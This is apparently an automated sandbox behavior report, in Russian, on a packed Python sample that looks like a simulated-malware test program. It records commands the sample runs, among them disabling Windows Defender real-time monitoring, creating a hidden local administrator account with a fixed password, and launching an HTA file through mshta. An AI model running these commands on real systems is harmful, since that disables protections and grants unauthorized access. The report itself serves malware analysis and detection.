Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Set-MpPreference -DisableRealtimeMonitoring $false"
Запускает на исполнение
- '<SYSTEM32>\net.exe' user MaliciousUser Password123! /add
- '<SYSTEM32>\net.exe' localgroup Administrators MaliciousUser /add
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\_mei30762\vcruntime140.dll
- %TEMP%\_mei30762\vcruntime140_1.dll
- %TEMP%\_mei30762\_asyncio.pyd
- %TEMP%\_mei30762\_bz2.pyd
- %TEMP%\_mei30762\_ctypes.pyd
- %TEMP%\_mei30762\_decimal.pyd
- %TEMP%\_mei30762\_hashlib.pyd
- %TEMP%\_mei30762\_lzma.pyd
- %TEMP%\_mei30762\_multiprocessing.pyd
- %TEMP%\_mei30762\_overlapped.pyd
- %TEMP%\_mei30762\_queue.pyd
- %TEMP%\_mei30762\_socket.pyd
- %TEMP%\_mei30762\_ssl.pyd
- %TEMP%\_mei30762\_wmi.pyd
- %TEMP%\_mei30762\_zstd.pyd
- %TEMP%\_mei30762\base_library.zip
- %TEMP%\_mei30762\certifi\cacert.pem
- %TEMP%\_mei30762\charset_normalizer\md.cp314-win_amd64.pyd
- %TEMP%\_mei30762\charset_normalizer\md__mypyc.cp314-win_amd64.pyd
- %TEMP%\_mei30762\libcrypto-3.dll
- %TEMP%\_mei30762\libffi-8.dll
- %TEMP%\_mei30762\libssl-3.dll
- %TEMP%\_mei30762\pyexpat.pyd
- %TEMP%\_mei30762\python314.dll
- %TEMP%\_mei30762\select.pyd
- %TEMP%\_mei30762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
- %TEMP%\_mei30762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
- %TEMP%\_mei30762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
- %TEMP%\_mei30762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
- %TEMP%\_mei30762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
- %TEMP%\_mei30762\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
- %TEMP%\_mei30762\setuptools\_vendor\jaraco\text\lorem ipsum.txt
- %TEMP%\_mei30762\unicodedata.pyd
- %TEMP%\program_log.txt
- %TEMP%\mal_data\simulated_shared_module.py
- %TEMP%\mal_data\malicious.doc
- %TEMP%\mal_data\dummy_timestomp.txt
- %TEMP%\mal_data\obfuscated_data.b64
- %TEMP%\mal_data\malicious.xsl
- %TEMP%\mal_data\malicious.hta
Удаляет файлы, которые сам же создал
- %TEMP%\mal_data\simulated_shared_module.py
- %TEMP%\mal_data\dummy_timestomp.txt
- %TEMP%\mal_data\obfuscated_data.b64
Другое
Ищет следующие окна
- ClassName: 'HTML Application Host Window Class' WindowName: ''
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "ver" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Get-Host
- '<SYSTEM32>\cmd.exe' /c "dir %TEMP%" (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "net user MaliciousUser Password123! /add" (со скрытым окном)
- '<SYSTEM32>\net1.exe' user MaliciousUser Password123! /add
- '<SYSTEM32>\cmd.exe' /c "net localgroup Administrators MaliciousUser /add" (со скрытым окном)
- '<SYSTEM32>\net1.exe' localgroup Administrators MaliciousUser /add
- '<SYSTEM32>\cmd.exe' /c "net localgroup Administrators MaliciousUser /delete" (со скрытым окном)
- '<SYSTEM32>\net.exe' localgroup Administrators MaliciousUser /delete
- '<SYSTEM32>\net1.exe' localgroup Administrators MaliciousUser /delete
- '<SYSTEM32>\cmd.exe' /c "net user MaliciousUser /delete" (со скрытым окном)
- '<SYSTEM32>\net.exe' user MaliciousUser /delete
- '<SYSTEM32>\net1.exe' user MaliciousUser /delete
- '<SYSTEM32>\cmd.exe' /c "mshta.exe "%TEMP%\mal_data\malicious.hta"" (со скрытым окном)
- '<SYSTEM32>\mshta.exe' "%TEMP%\mal_data\malicious.hta"
- '<SYSTEM32>\notepad.exe'
